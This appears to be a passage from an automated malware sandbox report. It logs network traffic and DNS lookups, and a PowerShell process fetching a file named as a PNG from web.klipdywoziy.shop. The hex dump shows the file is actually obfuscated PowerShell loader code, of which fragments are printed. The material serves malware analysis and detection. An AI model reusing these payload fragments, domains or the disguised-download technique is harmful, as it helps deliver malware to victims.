                                                      Jan 8, 2025 13:56:43.467310905 CET44349984104.21.112.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.467364073 CET49984443192.168.2.7104.21.112.1
                                                      Jan 8, 2025 13:56:43.467370033 CET44349984104.21.112.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.467395067 CET44349984104.21.112.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.467441082 CET49984443192.168.2.7104.21.112.1
                                                      Jan 8, 2025 13:56:43.467513084 CET49984443192.168.2.7104.21.112.1
                                                      Jan 8, 2025 13:56:43.467526913 CET44349984104.21.112.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.467536926 CET49984443192.168.2.7104.21.112.1
                                                      Jan 8, 2025 13:56:43.467541933 CET44349984104.21.112.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.490511894 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:43.490547895 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:43.490617990 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:43.490940094 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:43.490955114 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:44.401114941 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:44.401211023 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:44.405966997 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:44.405976057 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:44.406284094 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:44.407696009 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:44.451344013 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:44.978753090 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.058368921 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.204770088 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204783916 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204824924 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204838991 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.204843998 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204868078 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204883099 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.204891920 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.204919100 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.204996109 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.207087994 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.207094908 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.207123041 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.207175970 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.207175970 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.207185984 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.207261086 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.432085037 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.432111025 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.432178020 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.432194948 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.432239056 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.432259083 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.433702946 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.433718920 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.433763027 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.433770895 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.433809996 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.435626984 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.435645103 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.435739040 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.435745001 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.435789108 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.437361002 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.437376022 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.437463999 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.437474012 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.437517881 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.656795979 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.656810999 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.656858921 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.656902075 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.656914949 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.656949043 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.656949043 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.657388926 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.657406092 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.657461882 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.657469034 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.657524109 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.658816099 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.658832073 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.658934116 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.658940077 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.658988953 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.659643888 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.659660101 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.659713984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.659720898 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.659759998 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.660747051 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.660768986 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.660836935 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.660845995 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.660856962 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.660907030 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.661654949 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.661676884 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.661730051 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.661736012 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.661773920 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.742889881 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.742913961 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.743041992 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.743055105 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.743107080 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.849539995 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.882659912 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.882688999 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.882745981 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.882801056 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.882813931 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.882863998 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.882864952 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.883301973 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.883333921 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.883394957 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.883394957 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.883402109 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.883430958 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.883452892 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.883512020 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.883512020 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.883518934 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.884310961 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.884325027 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.884397984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.884413958 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.886941910 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.886960030 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887021065 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887027025 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887064934 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887453079 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887470007 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887509108 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887516022 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887545109 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887872934 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887891054 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.887948036 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887948036 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.887954950 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969450951 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969475985 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969693899 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969712019 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969744921 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969744921 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969760895 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969795942 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969798088 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969798088 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969809055 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969847918 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969861984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969861984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969871044 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969918013 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969918013 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.969943047 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.969963074 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970019102 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970019102 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970024109 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970149040 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970165014 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970196962 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970196962 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970201969 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970247984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970247984 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970305920 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970321894 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970345974 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970354080 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:45.970397949 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:45.970397949 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.107928038 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.107985020 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.108072996 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.108086109 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.108104944 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.108131886 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.108144999 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.108158112 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.108184099 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.108186960 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.108216047 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.108247995 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.119493008 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.119502068 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.119524002 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.119533062 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.119693041 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.119700909 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.119808912 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.122524023 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.123306036 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.194488049 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.194510937 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.194616079 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.194664955 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.194680929 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.194691896 CET44349985192.250.235.30192.168.2.7
                                                      Jan 8, 2025 13:56:46.194722891 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.194722891 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.194766998 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.201643944 CET49985443192.168.2.7192.250.235.30
                                                      Jan 8, 2025 13:56:46.201667070 CET44349985192.250.235.30192.168.2.7
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 8, 2025 13:55:07.912014008 CET5560153192.168.2.71.1.1.1
                                                      Jan 8, 2025 13:55:07.924254894 CET53556011.1.1.1192.168.2.7
                                                      Jan 8, 2025 13:56:33.201267958 CET4958653192.168.2.71.1.1.1
                                                      Jan 8, 2025 13:56:33.224514961 CET53495861.1.1.1192.168.2.7
                                                      Jan 8, 2025 13:56:43.469188929 CET5463953192.168.2.71.1.1.1
                                                      Jan 8, 2025 13:56:43.488790989 CET53546391.1.1.1192.168.2.7
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 8, 2025 13:55:07.912014008 CET192.168.2.71.1.1.10xf0fStandard query (0)web.klipdywoziy.shopA (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.201267958 CET192.168.2.71.1.1.10xba4cStandard query (0)quinceisoz.camA (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:43.469188929 CET192.168.2.71.1.1.10x5edStandard query (0)bigadcompany.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 8, 2025 13:55:07.924254894 CET1.1.1.1192.168.2.70xf0fNo error (0)web.klipdywoziy.shop188.114.97.3A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:55:07.924254894 CET1.1.1.1192.168.2.70xf0fNo error (0)web.klipdywoziy.shop188.114.96.3A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.112.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.64.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.80.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.32.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.96.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.48.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:33.224514961 CET1.1.1.1192.168.2.70xba4cNo error (0)quinceisoz.cam104.21.16.1A (IP address)IN (0x0001)false
                                                      Jan 8, 2025 13:56:43.488790989 CET1.1.1.1192.168.2.70x5edNo error (0)bigadcompany.com192.250.235.30A (IP address)IN (0x0001)false
                                                      • web.klipdywoziy.shop
                                                      • quinceisoz.cam
                                                      • bigadcompany.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749706188.114.97.34437700C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:55:08 UTC80OUTGET /kunnar.png HTTP/1.1
                                                      Host: web.klipdywoziy.shop
                                                      Connection: Keep-Alive
                                                      2025-01-08 12:55:08 UTC996INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:55:08 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 9107643
                                                      Connection: close
                                                      X-Powered-By: Express
                                                      ETag: W/"8af8bb-a2q2AN3RGYSB5Qx+s1RcWLTnOkc"
                                                      Set-Cookie: connect.sid=s%3AsBtJtFX1mhGHXJ_uu8NSN0xBMv68CXN6.7%2B21HHytq9M%2Fnci%2F38qf6UXrC8XGmuc3COyzadz%2FiNY; Path=/; HttpOnly
                                                      cf-cache-status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JalDGthoIxpBuNXyxhZ23fNwFeFLm9VeKWyxAL%2BJHEpbWnE1A6D92ILaVChtlRYScKsZfiiQGRAHnHfqsSxk0NOKgwAq0LAIW6y4ZifHqwaEpDM%2B9%2BabiaZo8Vvtw5JMWwzqLz0hjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec5716589742b0-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2486&min_rtt=2486&rtt_var=932&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=694&delivery_rate=1173633&cwnd=233&unsent_bytes=0&cid=11ac153a9882de3b&ts=410&x=0"
                                                      2025-01-08 12:55:08 UTC373INData Raw: 24 4c 4e 77 56 41 53 79 41 70 73 35 64 36 47 6a 53 4a 50 35 78 47 4f 53 33 55 38 6f 57 71 74 4d 30 71 61 37 62 5a 68 49 73 30 70 49 59 79 47 73 48 73 71 61 70 37 35 44 76 36 50 47 47 73 54 37 6a 4c 51 4b 54 34 55 62 51 49 66 51 57 65 59 77 73 62 72 5a 4a 4c 78 6b 69 42 65 69 30 71 4a 77 36 78 66 4f 55 39 6b 59 79 42 4b 75 4e 43 56 34 6c 79 46 61 51 54 65 4d 50 74 78 57 6e 54 45 68 47 6a 59 43 49 41 6f 48 4f 42 57 75 57 6d 4f 39 33 77 54 44 39 32 49 31 35 73 7a 43 64 33 75 41 57 58 72 42 33 36 4c 67 32 74 61 65 74 43 78 61 32 6c 41 6a 30 36 51 49 57 78 49 6d 49 58 58 59 7a 31 30 38 36 67 78 73 62 6e 54 48 49 34 79 37 46 42 4f 54 75 32 56 4f 37 59 51 6c 4d 4c 55 30 52 30 55 67 46 37 66 6b 63 54 31 52 38 65 6d 69 66 65 63 6f 48 54 4a 4e 43 45 4e 51 51 48 52
                                                      Data Ascii: $LNwVASyAps5d6GjSJP5xGOS3U8oWqtM0qa7bZhIs0pIYyGsHsqap75Dv6PGGsT7jLQKT4UbQIfQWeYwsbrZJLxkiBei0qJw6xfOU9kYyBKuNCV4lyFaQTeMPtxWnTEhGjYCIAoHOBWuWmO93wTD92I15szCd3uAWXrB36Lg2taetCxa2lAj06QIWxImIXXYz1086gxsbnTHI4y7FBOTu2VO7YQlMLU0R0UgF7fkcT1R8emifecoHTJNCENQQHR
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 79 33 73 6a 46 4e 47 62 62 78 30 38 65 4b 57 48 49 51 58 38 6e 54 54 79 65 74 51 4f 65 39 45 66 4e 49 78 46 50 62 4a 59 50 35 6d 56 43 33 5a 38 4a 43 67 35 66 6f 6b 63 69 63 30 48 58 32 53 36 53 6f 7a 34 6a 71 35 52 38 56 64 73 73 62 78 79 54 36 32 47 52 45 58 71 31 79 68 46 54 6a 41 69 39 65 70 32 4d 79 35 58 4e 36 4d 4b 67 6f 70 6b 49 4a 62 44 70 67 46 77 36 76 75 58 38 34 41 61 4f 36 6d 7a 58 44 37 47 6d 59 7a 42 36 51 59 68 4b 56 71 55 4f 65 70 71 4e 59 39 65 79 62 79 4f 38 45 33 74 50 68 46 69 6e 34 45 41 70 5a 78 69 4e 42 71 59 78 69 43 4e 4e 67 39 61 34 43 6c 74 38 6b 71 5a 4c 44 4f 6a 77 37 78 4d 72 4b 68 76 48 63 66 68 38 68 6f 57 6f 6f 61 59 20 3d 20 22 47 65 74 42 79 74 65 73 22 0d 0a 0d 0a 24 43 56 75 61 4c 68 4e 31 52 63 63 6e 4d 33 45 52 6c
                                                      Data Ascii: y3sjFNGbbx08eKWHIQX8nTTyetQOe9EfNIxFPbJYP5mVC3Z8JCg5fokcic0HX2S6Soz4jq5R8VdssbxyT62GREXq1yhFTjAi9ep2My5XN6MKgopkIJbDpgFw6vuX84AaO6mzXD7GmYzB6QYhKVqUOepqNY9eybyO8E3tPhFin4EApZxiNBqYxiCNNg9a4Clt8kqZLDOjw7xMrKhvHcfh8hoWooaY = "GetBytes"$CVuaLhN1RccnM3ERl
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 65 45 59 6d 50 4f 30 37 58 4d 41 51 6d 34 6b 76 43 4a 34 50 76 30 58 73 65 56 41 6d 6b 49 64 4c 65 70 62 46 39 54 54 75 76 65 6f 79 35 55 38 62 64 50 72 6f 7a 79 33 73 6a 46 4e 47 62 62 78 30 38 65 4b 57 48 49 51 58 38 6e 54 54 79 65 74 51 4f 65 39 45 66 4e 49 78 46 50 62 4a 59 50 35 6d 56 43 33 5a 38 4a 43 67 35 66 6f 6b 63 69 63 30 48 58 32 53 36 53 6f 7a 34 6a 71 35 52 38 56 64 73 73 62 78 79 54 36 32 47 52 45 58 71 31 79 68 46 54 6a 41 69 39 65 70 32 4d 79 35 58 4e 36 4d 4b 67 6f 70 6b 49 4a 62 44 70 67 46 77 36 76 75 58 38 34 41 61 4f 36 6d 7a 58 44 37 47 6d 59 7a 42 36 51 59 68 4b 56 71 55 4f 65 70 71 4e 59 39 65 79 62 79 4f 38 45 33 74 50 68 46 69 6e 34 45 41 70 5a 78 69 4e 42 71 59 78 69 43 4e 4e 67 39 61 34 43 6c 74 38 6b 71 5a 4c 44 4f 6a 77 37
                                                      Data Ascii: eEYmPO07XMAQm4kvCJ4Pv0XseVAmkIdLepbF9TTuveoy5U8bdProzy3sjFNGbbx08eKWHIQX8nTTyetQOe9EfNIxFPbJYP5mVC3Z8JCg5fokcic0HX2S6Soz4jq5R8VdssbxyT62GREXq1yhFTjAi9ep2My5XN6MKgopkIJbDpgFw6vuX84AaO6mzXD7GmYzB6QYhKVqUOepqNY9eybyO8E3tPhFin4EApZxiNBqYxiCNNg9a4Clt8kqZLDOjw7
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 36 30 35 39 30 29 20 2a 20 33 32 31 35 29 29 0d 0a 24 57 54 79 63 6a 62 51 4f 65 20 3d 20 28 28 28 28 28 38 33 33 20 2a 20 28 28 28 24 79 64 6f 54 57 6b 66 48 20 2d 20 2d 34 31 38 33 38 37 29 20 2a 20 2d 31 37 32 34 35 29 29 29 20 2a 20 32 37 29 20 2b 20 30 29 20 2b 20 28 28 28 28 28 24 57 54 79 63 6a 62 51 4f 65 20 2a 20 31 37 35 29 20 2b 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2d 20 33 31 38 36 37 29 20 2a 20 24 72 52 48 76 77 6e 77 66 4b 70 52 29 29 29 20 2a 20 28 28 28 28 2d 38 33 33 20 2d 20 35 37 35 29 20 2b 20 24 57 54 79 63 6a 62 51 4f 65 29 20 2a 20 36 39 37 39 29 29 29 0d 0a 24 46 4b 75 76 62 58 5a 4f 45 76 5a 20 3d 20 28 28 2d 31 20 2b 20 28 28 28 24 57 54 79 63
                                                      Data Ascii: NpTncjvapJ) - $KVHojVRko) * 60590) * 3215))$WTycjbQOe = (((((833 * ((($ydoTWkfH - -418387) * -17245))) * 27) + 0) + ((((($WTycjbQOe * 175) + $KVHojVRko) - 31867) * $rRHvwnwfKpR))) * ((((-833 - 575) + $WTycjbQOe) * 6979)))$FKuvbXZOEvZ = ((-1 + ((($WTyc
